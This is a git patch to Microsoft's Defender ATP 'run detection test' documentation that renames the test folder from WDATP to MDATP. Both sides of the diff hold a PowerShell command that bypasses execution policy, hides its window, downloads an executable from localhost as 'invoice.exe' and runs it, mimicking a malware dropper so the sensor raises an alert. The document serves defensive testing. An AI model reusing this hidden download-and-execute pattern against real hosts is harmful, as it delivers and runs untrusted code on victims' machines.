From e7e1753ecdb72351498ce6fe12c057b084402f31 Mon Sep 17 00:00:00 2001 From: Steve Burkett Date: Fri, 22 May 2020 12:10:14 +1200 Subject: [PATCH] Update run-detection-test.md Update folder and script to use the MDATP branding. --- .../microsoft-defender-atp/run-detection-test.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md b/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md index 2251ec4e49..624f4aaf34 100644 --- a/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md +++ b/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md @@ -30,7 +30,7 @@ ms.topic: article Run the following PowerShell script on a newly onboarded machine to verify that it is properly reporting to the Microsoft Defender ATP service. -1. Create a folder: 'C:\test-WDATP-test'. +1. Create a folder: 'C:\test-MDATP-test'. 2. Open an elevated command-line prompt on the machine and run the script: a. Go to **Start** and type **cmd**. @@ -42,7 +42,7 @@ Run the following PowerShell script on a newly onboarded machine to verify that 3. At the prompt, copy and run the following command: ``` - powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe' + powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' ``` The Command Prompt window will close automatically. If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes.